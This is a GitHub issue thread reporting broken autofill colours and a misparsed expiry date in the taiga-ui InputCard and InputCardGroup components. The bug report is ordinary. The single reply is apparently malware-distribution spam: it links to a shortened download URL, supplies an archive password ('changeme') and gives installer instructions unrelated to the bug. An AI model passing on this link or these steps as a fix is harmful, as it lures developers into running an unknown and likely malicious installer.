### ISSUE TITLE
🐞 - `InputCard` / `InputCardGroup` broken autofill colors

### ISSUE THREAD

**Issue by waterplea** [taiga-family/taiga-ui#8712]
### Description

<img width="318" alt="image" src="https://github.com/user-attachments/assets/ea479371-15e5-42b5-a410-349c4dfebf4d">

<img width="153" alt="image" src="https://github.com/user-attachments/assets/7d9e51de-507a-42d2-92a8-f7fa59f81344">

<img width="133" alt="Снимок экрана 2024-08-27 в 19 28 58" src="https://github.com/user-attachments/assets/77058ef5-638b-4f39-acf1-09d71e428ff7">

Also seems like Expire Date is incorrectly parsed in `InputCardGroup`

### Which browsers have you used?

- [ ] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Edge

### Which operating systems have you used?

- [ ] macOS
- [ ] Windows
- [ ] Linux
- [ ] iOS
- [ ] Android

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
